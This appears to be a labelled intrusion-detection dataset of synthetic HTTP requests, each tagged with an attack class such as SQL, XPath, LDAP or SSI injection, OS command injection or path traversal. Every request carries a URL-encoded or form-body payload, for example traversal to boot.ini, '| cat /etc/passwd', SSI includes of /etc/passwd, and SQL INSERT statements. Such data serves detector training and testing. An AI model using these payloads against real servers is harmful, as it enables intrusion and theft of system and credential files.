Warning: 305 53.141.60.13 "ymreiTeeg1dos2e" "Sun, 14 Oct 07 07:03:33 CET"
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40133
Start - Id: 36034
class: PathTransversal
GET /p-.esehuYD63/qD35EedhotshiEFe/NoDwdT/deonisy7g/0SyttenenatefnUpbh/6hZFae9AMoLC3Ozy/.ehavingJGT@qxwI/sS_g-39P4I@O.msf?tsri9diz6zlioE=t%3A%5Cwindows%5Cboot.ini&wleE=24&jn2=385 HTTP/1.0
Host: 135.1.92.125
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1;q=0.1
Accept-Encoding: compress;q=0.0, deflate, compress;q=0.9
Accept-Language: drgwseut-u;q=0.0, 7tjl-a7bft;q=0.3, An04nn-7eHarea;q=0.6, ehssnEe-E7oleCei
Cache-Control: min-fresh=37265
Client-ip: 126.60.242.180
Cookie: 98=3d;ztb=75303;N8pnha8ltttw=eb+erroern2w;LacndpMylt=Naerl2
Cookie2: $Version="384"
Date: Tue, 26 Jun 07 14:37:40 GMT
ETag: "@DqH@f35fP9EUzd2"
Expect: 100-continue
From: yko0aa0@wnoagzEgT.de
If-Modified-Since: Tue, 01 Dec 09 02:41:06 CET
If-Unmodified-Since: Tue, 16 Nov 04 24:31:11 GMT
If-Match: "Wkr8DeoL2IX9t@Vi2mc"
If-None-Match: "dDW9HIsDEgGc8dyW"
If-Range: Fri, 28 Aug 09 12:25:19 UTC
Max-Forwards: 8
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM cHNicHlsZWVkd2J1bjM0aHFpdGR0SWNveTFzZGxFRnpkMHRqYW8=
Authorization: Digest nonce
Range: -9,25-34306,2-799
Referer: /ebdet/bu4i/eeTvetn.nsf
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/1.9 (Windows; U; Win98 7.5; hn-0t; rv:5.3.4) Gecko/39099447
UA-Disp: 1024,515,8
UA-OS: Windows 95
UA-Color: color32
Via: HTTP/0.3 www.rhwat.gif, 4.0 www.8ds5mig.css
Transfer-Encoding: deflate
Upgrade: r6o/7.3, yasdf/6.0, unlO/6.7
Warning: 147 www.drndra.tiff "Slyqiecbrsiea" "Wed, 18 May 05 16:14:14 UTC"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 83480
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36034
Start - Id: 49849
class: XPathInjection
GET /aov6pateOg0rktr/netaue/Pe/qxfLhJvs/tS_o_@eUA8Y/nph-havingCchttpO/rd9Wn/szTKmvY.asp?aawetc=eZlaUgqBSA&e3aige=tyD&uw=set3fT%27%5D++++%7C+++P+++++%7C+%2F%2Fuser%5B++++name%2Ftext%28+%29+++%3D+%27rmgE&ee=06&epgftujt9cTao=cquegipTt&WTshutdownqIZRDzVPK=tdocument4exp_ohoinsertau&vt3effEosgbnhrH=ongnltDqeHceha8qt&mdwrNU=iei&ota=0985663405&elutponqpgief=NuhE8Taccept+igncopyposition8&Tnl0o=i3Z HTTP/1.1
Host: 94.116.250.100
Connection: close
Accept: application/x-tar, text/*;q=0.7
Accept-Charset: x-mac-chinesesimp;q=0.4
Accept-Encoding: identity
Accept-Language: 07ti-wxhlahng, sNynebn-zendpy
Cache-Control: max-age=12050
Client-ip: 236.200.66.115
Cookie: ims=rtt? )liobraccE;tgrlEhhraelhle=73810642;urepdetoemb5rie=tt=em
Cookie2: $Version="7"
Date: Mon, 02 Apr 07 21:23:07 UTC
ETag: W/"Xx8JR4V4r-QIlXyJ"
Expect: oTadc
From: ohlydam@WdehaAi.biz
If-Modified-Since: Mon, 22 Aug 05 16:28:36 UTC
If-Unmodified-Since: Wed, 30 Dec 09 21:28:58 UTC
If-Match: "PU_DlUXrgu.Bkj.f"
If-None-Match: "Q2f3jnzcL__YweJPvAI"
If-Range: "lAYvHJzhWGqTjWDvS"
Max-Forwards: 729
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: i0phE o2nl=eewznpi
Range: 98475-041,374-
Referer: http://aodwng.fr/HCrem1y/5yfto2Ro.mp3
TE: gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/9.7 (Windows; U; WinNT 9.5; Ie-ia; rv:4.7.5) Gecko/51627024
UA-CPU: 68000
UA-Disp: 020,0020,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 967x245
Via: FTP/0.7 140.133.133.58
Transfer-Encoding: gzip
Upgrade: soar/0.1
Warning: 988 26.40.140.189 "waoenT" 
X-Forwarded-For: 56.172.198.103
X-Serial-Number: 6075380404911977
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49849
Start - Id: 49060
class: XPathInjection
GET /lHrgquaTInow/mo1pireg/dtrfjqfseoepL6frt/d2estfonsrnveudsdhjH/mlstai5cleiish/ju6Co/uCyN@yxK/hYgLWnetcat/ydrhninedutpjset1ot.gif?t7ni=etmh%27+or+1%3C+8z%2Fnynh0h%2F8ynRae%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D768%5D+or++++%27qa5oel%27++%3D++%27 HTTP/1.1
Host: www.30eiqfnnir.st:80
Connection: rans
Accept: audio/x-wav, application/postscript
Accept-Charset: utf-7;q=0.3, iso-8859-8-i
Accept-Encoding: 
Accept-Language: Agp-snda, trsf-Crn, itdsr-e;q=0.9
Cache-Control: max-age=197
Client-ip: 164.173.183.167
Cookie: Hredrgndox=68;ntottHrtrlm=17
Cookie2: $Version="84"
Date: Mon, 22 Mar 10 05:46:13 UTC
ETag: W/"bj@Q8.9F_UsS-HtPu"
Expect: 100-continue
From: oT4sie@pMej.gov
If-Modified-Since: Mon, 15 Jun 09 07:21:39 CET
If-Unmodified-Since: Wed, 07 Feb 07 19:35:07 UTC
If-Match: *
If-None-Match: "tVEDm1DEek3CZXbowu"
If-Range: "-fyfkGnTp4kv0snB"
Max-Forwards: 00
MIME-Version: 6.2
Pragma: nd=7zo
Proxy-Authorization: Digest qop=auth
Authorization: Basic bXIxdHJuOm9zcGE2
Range: -78,-30745
Referer: http://www.hts1r.gov/dfdi/Nnpneen/amads6/0dAkh.mdb
TE: chunked,deflate;q=0.8
Trailer: User-Agent
User-Agent: Mozilla/1.2 (X11; U; Unix 7.1; sq-vi; rv:2.5.0) Gecko/49763496
UA-CPU: x86
UA-Disp: 357,241,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7313x7197
Via: HTTP/5.8 www.srpoanr.css, FTP/9.7 174.224.157.210:69912, 5.6 www.ash3ta.html
Transfer-Encoding: identity
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 712 141.86.56.222 "RenNkwhed" "Fri, 05 Oct 07 19:54:02 GMT"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 00114
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49060
Start - Id: 43194
class: OsCommanding
GET /KKautoexec7E@havingXqDW/nqFJmK3.eKBnr/iaoiEsDdEba6artetR/zP8PyBnO4GWzTF/hleahknar/p8yhfl/htpass2KTzOJFtXniqfa/kmenprnnakyhcE/dseinSaa.jpeg?tiyIdie9Hceh=rsg&gJ-kJOQ3xxmP=seEliswttfecho&_5A.m9-U=bs7to5i7uKt&unionLvfjU9mC=++++%3B+++++echo++%3B++w+%3B+uname+++-a+++++%3Bid&oanee79on=533&t54rwijhNol=t4I-QN&hzioa4zeela5ca=ea&bodyMis=xezah&mw1ttoSaii2=beoitstjph+aboM&oondRoJyTxure=hEnepdhp1hert&aafdZznSol=sfi&oittReat=adtahHks7eesdnsmu&drbLAlgl=93243921&ae6=3086049 HTTP/1.1
Host: www.a1ra1s.fr:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 157.236.28.151
Cookie: tTroethit=o Sac;gusrv4CafKx2=356;z8tboot.inimrMtJHbH=$tmp5;afnothiiqotel=ncqi5
Cookie2: $Version="9"
Date: Mon, 20 Feb 06 20:07:57 GMT
ETag: W/"KYfItSm50fanzuTuw"
Expect: 100-continue
From: dsmHrei2@sentDlSn.biz
If-Modified-Since: Sat, 10 Sep 05 23:48:37 UTC
If-Unmodified-Since: Sun, 25 Apr 04 08:46:52 UTC
If-Match: *
If-None-Match: "cw5L3pYnaTmQVZe@lj"
If-Range: Sun, 23 Nov 08 17:49:29 GMT
Max-Forwards: 4
MIME-Version: 7.5
Pragma: oea='nc'
Proxy-Authorization: neeoh eyo1ad=huxteEf
Authorization: Digest nonce
Range: 3473-351,462906-
Referer: http://rdnh.cz/if8e.js
TE: chunked
Trailer: Authorization
User-Agent: ht4aes8eDgt
UA-CPU: StrongARM
UA-Disp: 1503,1276,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 953x846
Via: ttpdeu/3.1 138.106.153.152, 4.3 22.237.198.104
Transfer-Encoding: identity
Upgrade: hi11/1.2
Warning: 407 143.65.197.47 "assaq" 
X-Forwarded-For: 64.137.223.100
X-Serial-Number: 5739795926736555
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43194
Start - Id: 40589
class: SSI
GET /jp/juededxeira/hiWHtyfweatiiusrxy.shtml?rm55M=dodret&ilst=270974&ss8irtoat=%3C%21--+%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++++--%3E&3zdmoEnee1g=%3Dry+%7Ca%7C%265%3F&rgsakdc=ar%27sda%7EhBSi%3Aghtpassakid HTTP/1.0
Host: www.th6yire.uk
Connection: keep-alive
Accept: video/*, video/mpeg
Accept-Charset: *
Accept-Encoding: compress;q=0.7, identity, compress;q=0.8, deflate, gzip
Accept-Language: Hpoer-a7ru2rnE;q=0.8, 4srihens-m8stal;q=0.2
Cache-Control: min-fresh=1
Client-ip: 25.93.112.146
Cookie: 8a1ores=259336813;aeUe=280;h4ifces=oihtaccesh;mgttenwN=08;ylshagdm=zbncawonastt;mtmtmi=72
Cookie2: $Version="3"
Date: Tue, 19 Sep 06 23:33:44 GMT
ETag: W/"bb110ijb0AjJQj0"
Expect: 100-continue
From: tiotlhOg@Ee0em4sr8.gov
If-Modified-Since: Fri, 05 Mar 04 01:59:03 GMT
If-Unmodified-Since: Mon, 12 Feb 07 03:04:26 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 26 Dec 06 14:51:29 GMT
Max-Forwards: 36
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM YWhlYXFlbmhuY2U4aHlhdGxOZWk1ZGVtdG91QTVsMXJycWVtZWRmZTFoNG9sTnI=
Authorization: Digest algorithm=MD5-sess
Range: 9102-264,3606-,-14
Referer: /rse7iyau/dneSj6.exe
TE: trailers,deflate,trailers
Trailer: If-Range
User-Agent: Mozilla/7.7 (Machintosh; U; Mac OS X 5.5; 9k-ca; rv:6.5.0) Gecko/44171958
UA-CPU: StrongARM
UA-Disp: 2015,473,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 972x7445
Via: FTP/6.4 55.207.231.13, ex2r6/2.9 136.83.100.0, HTTP/4.1 1.91.195.76
Transfer-Encoding: compress
Upgrade: sez4st/8.2, mnseuu/1.0, fszf/8.0
Warning: 737 www.suaxgW.shtml "9arerm" 
X-Forwarded-For: 198.124.190.146
X-Serial-Number: 69115
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40589
Start - Id: 35927
class: PathTransversal
POST /mTU4a/ofhogsi.html? HTTP/1.0
Content-Length: 257
Content-Language: sirn,k
Content-Encoding: deflate
Content-MD5: aTVuZnNhdDZkZXRpb3NyYw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 17 Oct 06 13:56:08 GMT
Host: www.8Iardho.com
Connection: close
Accept: video/mpeg, application/*;q=0.5, image/*;q=0.2
Accept-Charset: *
Accept-Encoding: deflate, identity, gzip;q=0.9, deflate, identity;q=0.8
Accept-Language: ek-dTmecwts;q=0.0, te-l7yt;q=0.0, igstle-na, ec80p-yphhadr;q=0.7, c-NRtnvi;q=0.1
Cache-Control: min-fresh=29
Client-ip: 250.38.166.171
Cookie: guato=panewget
Cookie2: $Version="489"
Date: Mon, 22 Mar 04 18:58:32 UTC
ETag: "fyoO2z0l@-7G5Y77R"
From: roTghx@6yttkye.com
If-Modified-Since: Mon, 08 Mar 04 10:52:53 UTC
If-Match: "sbu_HvnYLW1iu.go3"
Max-Forwards: 25
MIME-Version: 6.4
Pragma: loIaonnw='nlqurba'
Referer: /llosr/nsnrbgec/emnLoie.txt
TE: gzip,chunked
User-Agent: Mozilla/2.9 (Windows; U; Win98 8.2; dn-l2; rv:0.3.2) Gecko/95883693
UA-Disp: 164,2432,32

YrAD=47192098&stylebcSaw=iWw@1y&efcaecax=hn>r? &lEQWNIjBG=bvaxt&aef1esa=shutdownrtgl&Iomner=5uWJ9_w&jidew=43&JUinputlogrGWK=oDeal&taEtl3tgiAxIs2=ond&gcEBexecNobjectb0XHh=<!-- #include  virtual="/etc/passwd"    -->&Elcnaoxm6eeEHor=324

End - Id: 35927
Start - Id: 36981
class: LdapInjection
GET /pShGcuXallw/nos8K7NW.F5KN/StHkoa8nmltSairu4n/ru/qohXlpC/doeetlivbfejwao.html?K7oech=3795%29%28%26%28objectClass%3Dshe%29%28%7C%28sn+%3D++++cn%29%28cn%3Drt+J*%29%29 HTTP/1.1
Host: www.aosCraoR.ch
Connection: keep-alive
Accept: application/rtf, audio/basic
Accept-Charset: us-ascii;q=0.1, iso-8859-7;q=0.7, windows-1254;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=4
Client-ip: 41.167.121.88
Cookie: imscriptO21YtCH-=g
Cookie2: $Version="2"
Date: Sat, 14 Apr 07 03:54:01 GMT
ETag: W/"YZcyTj4_d3_1LAB"
Expect: lius
From: 4t9lsozn@n1ns8ofqic.ch
If-Modified-Since: Tue, 06 Jul 04 23:40:22 GMT
If-Unmodified-Since: Fri, 18 Aug 06 02:46:42 CET
If-Match: *
If-None-Match: "pc-oEkXLVe-JP1W"
If-Range: "tIEpV54KJtfgbVYqooZ"
Max-Forwards: 0366
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM eW9ucG1pN25zYWlSa3JmZWlrdFRXMm9oc2dkc2VkbmxlZjNv
Authorization: Digest algorithm=lHno4y97
Range: 84-,-422477,1197-5319
Referer: /mtITrm/ioatw6p.gz
TE: deflate,trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/0.7 (compatible; MSIE 3.3; Unix; ujsai6; riie)
UA-CPU: StrongARM
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 654x7541
Via: 2.1 9.74.30.161:311, 7.0 www.rd0Dyhar.jpg, 7.6 203.148.148.139
Transfer-Encoding: 6eo02
Upgrade: cbn6/9.4, n3stvo/2.0, hs4/8.7
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Forwarded-For: 159.94.130.144
X-Serial-Number: 4593021783716355
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36981
Start - Id: 36825
class: OsCommanding
GET /il2RXBZy9rtmI5/lwQnG/iPz1nyj0ntkiBI5u/vR5X3sskJAz5XZMXbfx/e7YodmOSfkEfZEHq/noytcexgtsyg/ddeow3daeeeeru/ogb/T7eY44X/hgdex@SIY/aXrdd7oKR7AIJewQg-.js?J0HUTftpT=%7C+++cat+++%2Fetc%2Fpasswd&UySUK0I=8aa&yp9aodico=7&iphsdqtd8eeere=vdtoe+&0auTmresc=niio&rriYpcaaHehs=%7Edtseul&nyrhuh8lip=eeallory7irgAbrspt&eHdislet=irdt HTTP/1.1
Host: www.duIhta.gov
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: or-neeecq8
Cache-Control: only-if-cached
Client-ip: 108.91.8.21
Cookie: eQnMepNti8e=noeedg;dri=ooe;djbinV=ya;Vnph-K346htpass=dle
Cookie2: $Version="33"
Date: Thu, 30 Oct 08 09:46:21 UTC
ETag: W/"n1sNMWkNoy-Jb.Wz"
Expect: 100-continue
From: aPre@Ehts2SDd.ch
If-Modified-Since: Wed, 21 Nov 07 01:07:25 GMT
If-Unmodified-Since: Mon, 20 Jul 09 22:12:34 UTC
If-Match: "GwWeouVuOkSAbnVv"
If-None-Match: *
If-Range: *
Max-Forwards: 6529
MIME-Version: 3.6
Pragma: me8t=dOx
Proxy-Authorization: iaejf6 xN9h=Rnvltnn
Authorization: NTLM bFNsaGxsdXNxNG11SGYwMHNtM2xlaHNnZXVpcm5kb2VwbnptZE0=
Range: -95
Referer: /f4t0/menyti.rar
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: 4cyb8w1 http://www.n0ayu2x.fr
UA-CPU: 68000
UA-Disp: 603,438,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1930x9863
Via: 8.6 www.pthaf.png
Transfer-Encoding: compress
Upgrade: ehioe/8.2, aew/1.1, i8tRt/4.5, Ox2yni/4.8, 3seho/8.1
Warning: 649 www.csc0sg.js "anssgt3hmn3ennroren" "Wed, 05 Dec 07 14:41:31 UTC"
X-Serial-Number: 076281973736224985
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36825
Start - Id: 42813
class: OsCommanding
PUT /sYachOe67oeee/.EG/5eoElrwriTnodgicOa.jpeg? HTTP/1.0
Content-Length: 306
Content-Language: Pmei,pras
Content-Encoding: compress
Content-Location: http://lvdays1f.be/uhd9n.html
Content-MD5: aXR0emFpb3M3cmFodzFOcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 07 Jun 05 18:33:14 GMT
Last-Modified: Tue, 21 Sep 04 11:56:13 CET
Host: 28.91.1.109
Connection: close
Accept: */*
Accept-Charset: windows-874;q=0.7, iso-8859-15;q=0.9, iso-8859-8;q=0.1, us-ascii, windows-1251
Accept-Encoding: gzip, identity;q=0.8, identity, identity
Accept-Language: n-s, 8olY-E5taS
Cache-Control: min-fresh=6773
Client-ip: 148.210.33.174
Date: Thu, 19 Aug 04 15:58:49 CET
If-Modified-Since: Tue, 05 Jul 05 16:08:24 UTC
If-None-Match: *
If-Range: *
Max-Forwards: 6656
Referer: /eiee7mht.txt
User-Agent: Mozilla/9.4 (Machintosh; U; PPC Mac OS X 9.3; dr-7e; rv:2.1.5) Gecko/23220803
UA-Pixels: 0367x479
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

itld5o0TwNtaZ=eae&1ehreo=9aDd&tt04=h An&O9asr=9389728&tlPa=|     dir     ..\\..\\..\\..\\..\\..\\..\\  ,&y05dsct=rZO3lI&gu4-J7brml=9&eulneswrxriB=f% biltnane0taalr&rmstde=mcwindow.open&eYR1duatqero=efhc7d-rllsi5etc?cd&wtmppSIF9dvar=d0jajGS&0zsa=93133&fHYe4nEmkjay=139610

End - Id: 42813
Start - Id: 41757
class: SqlInjection
GET /gct/flI7mRBtzy6sleeUei/yd/pssamCV/sq/o_yJCLwL2fzNxu@ODqpD/twAW4Tm-b2Reh6v./3E0Ljial.asmx?eiyen=ttLavEWD5&psa=tsulgHihbeos&tiyoa0ro=eeteetsoetr0&aanusruwaSb=68352&eldon=dcFO5nnrtei&reaom2oeeo1=%3B++++EXEC%28+%27UNI%27%2B%27ON%27%2B%27++++%27%2B%27SEL%27%2B%27ECT+++++++++%27eeosndk%27%2C01%2C53305%2C%27sshze%27%2C9+++++FROM+Ehkil%29&znicadaKdtTsTe=xml+6sae&Z6q5cISM0XDy=s7j%40e+71ip%25wchild%26 HTTP/1.0
Host: 135.146.71.23
Connection: keep-alive
Accept: audio/basic;q=0.4, audio/basic;q=0.5, image/*
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.2, identity;q=0.3, identity;q=0.6
Accept-Language: 7anmah-mdcmc67;q=0.2, apn-rs, cnit-yooIan
Cache-Control: only-if-cached
Client-ip: 122.67.58.101
Cookie: Uithl=obeyw;bi=6309;rh=oyar;d6S=Qa-xiaiic;8JOfY38TqB=irhedan7tersreheSe
Cookie2: $Version="416"
Date: Tue, 31 Jul 07 15:16:06 UTC
ETag: W/"EXL1-db9KXgI.iBSUiN"
Expect: osevnd
From: lehFo@eioiwni.cz
If-Modified-Since: Sun, 27 Jan 08 13:17:56 UTC
If-Unmodified-Since: Mon, 24 Jul 06 04:52:30 UTC
If-Match: "1MwpV.LPxdC.m21KXIjh"
If-None-Match: *
If-Range: Sun, 17 Apr 05 20:31:27 CET
Max-Forwards: 421
MIME-Version: 3.9
Pragma: n='rsnbi'
Proxy-Authorization: Basic c0F0b3k6ZW4wbm9vdG0=
Authorization: oeeas rrimqd=erasjwwt
Range: 4234-490888,-164882
Referer: http://7omoA.fr/toiew/sscam/ogovof/ndkuo.mdb
TE: gzip;q=0.9
Trailer: Cache-Control
User-Agent: Mozilla/0.2 (Windows; U; WinNT 5.4; od-e0; rv:5.6.8) Gecko/64653358
UA-CPU: 68000
UA-Disp: 9710,8359,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8272x964
Via: 1.9 65.212.198.44:49484, FTP/9.6 204.103.111.215, 0.8 45.66.246.243
Transfer-Encoding: deflate
Upgrade: 0rei4d/2.0, titan/4.1, nsj/8.7, ngq/4.4
Warning: 486 www.rgnso.shtml:1 "waivD4wgcsuaoDeedtp" "Fri, 12 Feb 10 10:10:14 GMT"
X-Forwarded-For: 140.12.238.50
X-Serial-Number: 81915611891
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41757
Start - Id: 42381
class: SqlInjection
GET /epDa4/062/iYWIaxkOIL8cGR/cv/mlrt2UY5Z/eh6laJd/cce6fATf0n/es/cIBWYbUMT.htm?rsyyrkt2=drnErd&fsdo3=7wconnecteq&nkeeikaidd6=opttNr+&ovsgo3dh=%27%3B+++++insert+++into++ssena+++++values%28666%2C%27ad4doin%27%2C%27ml%27%2C0xfffff%29&si=yp5ancdhtnm&iigtAtakNahW1=71071815&iciZ4fn=65038700 HTTP/1.1
Host: www.eeao.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.5, compress, deflate;q=0.6, gzip, gzip
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 237.97.207.139
Cookie: hMmihrnnHiimS=weaziugd9ol8uiie;f5nimdd3=o T;tlLxui=1JbQZOX0bwr6;shetae6rhErs=7804
Cookie2: $Version="35"
Date: Mon, 11 Jul 05 16:34:47 CET
ETag: "tN-IZ4t1Xvz3PGGu4c"
Expect: i9uee=ulse;erondh=eeatm
From: nU8g@Ctnnlleoe.st
If-Modified-Since: Sun, 18 Dec 05 03:49:48 GMT
If-Unmodified-Since: Tue, 17 Jun 08 16:05:21 CET
If-Match: "qG47FfE4aKck@72A"
If-None-Match: *
If-Range: "xTzakPSmG.D.Q2WIE"
Max-Forwards: 5543
MIME-Version: 9.3
Proxy-Authorization: qceto diof8g=camemest
Authorization: oeifa renlcmT=aansato
Referer: /yatDie/9adaef.jpeg
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/7.2 (compatible; Konqueror/3.8; Win98; it5bf)
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: 0.8 80.34.36.102, 4.9 www.bxhehetn.html:0749
Upgrade: TyteS/4.7, iaa/1.6, irg/7.1, 8lsno/4.8, era/0.2
Warning: 574 57.17.46.185 "veun9pelul" 

null

End - Id: 42381
Start - Id: 39822
class: SSI
GET /9XU/fCallOjG/c2-osWfXbMbw/ctrbwz7lcu/ttXar7aN5MkhZnJskT/nD3PCMXy54e-eta1z/nqlqF01w4xz9ixZtCX/taeea.php4?tjilp=childn&yoEdhY=ssT.IjkB&aefO=DLhtmpt&acyprrne=66260&tl4o=50&itdtahzooby=02&oimonv56dllw=jiQb&ltw=77&7e0n=%7Eermorrosrhr&hIGm_vDB=%26-%3At%3Ertesftrl&G0avGsN085=%3C%21--+++%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++--%3E HTTP/1.1
Host: 20.53.1.194
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.8
Cache-Control: max-stale=77203
Client-ip: 179.116.196.3
Cookie: oLUxconnectnetcat4Xbgsoundcbj=3l7zjRB-fP3;SSseg8pe2K=379;9ho5sietoT=$bhonufuflr setolaccepto;hkOscriptjZo=665
Cookie2: $Version="15"
Date: Sat, 10 May 08 04:10:43 UTC
ETag: "nh-L3-xB8cm82HcCivd"
Expect: rsGesn
From: fEkbo16t@uycIttryA.biz
If-Modified-Since: Sat, 08 Jan 05 23:16:06 GMT
If-Unmodified-Since: Sat, 01 Nov 08 02:31:46 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 28 Jun 06 10:06:57 CET
Max-Forwards: 22
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic aWJlejJFUGk6dWVibGV3
Authorization: taxs reahho=t9eaicne
Range: 40-,-909,-0651
Referer: http://www.oriuahpi.de/eSei/n5srcdh/wnFf/h2px/oo45.msf
TE: trailers,gzip,trailers
Trailer: Accept-Encoding
User-Agent: otdurl/6.5.4.4
UA-CPU: Sparc
UA-Disp: 052,114,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9632x079
Via: 9.4 232.33.104.2, FTP/0.7 87.1.80.182:9
Transfer-Encoding: deflate
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 728 www.6meT.htm "tbadlt3aeEaT" 
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 408744625517883
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39822
Start - Id: 39537
class: SSI
POST /af4PWVE3arfOf49e_@@w/0zlsfEcrdet/blibqjOHuwXiYm/G_QzqV1/es8CZBLGQ/MhVnSXZMT/6itnnThjonimnds/ehr/cner4CinHanLE/2eqwtleri/dRt.png? HTTP/1.0
Content-Length: 322
Content-Language: scH,P5oe,ckr
Content-Encoding: identity
Content-MD5: OGJjZWVhZW5zcjh5ZG5vTw==
Content-Type: application/x-www-form-urlencoded
Host: www.yr0mSn.fr
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale
If-Unmodified-Since: Mon, 25 Jan 10 06:10:34 UTC
If-Match: "AOaByqyMik-UOaM"
Max-Forwards: 7
Proxy-Authorization: Digest nc=Aad2fB7A
Authorization: NTLM c3M1ZW8ybGw4b296eG5pZWxhc2xhbGFvTmdxdGFsZWV1Z2xkbnNyaHJucg==
Referer: /t7aNgeTb/1wk3nve/imOi.htm
User-Agent: Mozilla/7.1 (Machintosh; U; PPC 1.2; ta-e9; rv:9.5.6) Gecko/20542563

ivytggol=ejBnb&tat6rclEf=sdoIj6mkdexec74&smmiaNeG5fuiiio=cT-A&eauceltythsdgz=5321972804&lgtseh=33&EpsprRs=l3nalszit&o5iTruqn70Chee6=tkJm4-DiPtG&uoyt0et7e9t=<!--    #include  virtual="/etc/passwd"    -->&echr=433628&AOu=eelGen&oozi=30363565&fDinputczS0P-=al13PEJ5j_H&heaFseelsf2ha=lnullte&qiets=3bboot.ini

End - Id: 39537
Start - Id: 45625
class: PathTransversal
GET /lxKdqLp9Z/Xr.exe?xrpasswdIH6qUq=..%2F..%2F..%2FWINNT%2Fautoexec.bat&4eL5rajm9enhswb=aescWoC28&cR94d8EHg=218188&estEnees=m++flocationtaccepthavingtl+%5Di1ib&dbarhf=2&ZdocumentiXA0x_P=tmpzrn8%3DePxa HTTP/1.0
Host: www.aketDis.fr
Connection: close
Accept: text/xml, video/quicktime, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-age=4
Client-ip: 195.95.107.247
Cookie: A4xp_dzz39=4zVi
Cookie2: $Version="56"
Date: Wed, 12 Aug 09 17:24:16 CET
ETag: W/"e-05gzKLIPTgpb.sl0"
Expect: seoOtore
From: d0eeeh@siwe.fr
If-Modified-Since: Mon, 12 May 08 22:01:41 CET
If-Unmodified-Since: Tue, 02 Aug 05 01:39:20 CET
If-Match: "bAsTW383JDRa0PgbyVJ"
If-None-Match: "PE_W_hMPwQMqN5X9lxY"
If-Range: Mon, 11 Sep 06 19:44:15 GMT
Max-Forwards: 036
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic bnloYVQ6aXNydGh0eXM=
Authorization: Digest qop=auth
Range: 41-9272,-212,7881-582
Referer: /l9ensmg.dll
TE: deflate;q=0.2,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: 4z7fl/0.4.5
UA-CPU: Sparc
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 116x3462
Via: FTP/3.1 www.epolm.html
Transfer-Encoding: compress
Upgrade: wdths/1.4, ocajr/8.7, hnt/8.6
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 749320741
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45625
Start - Id: 35011
class: SSI
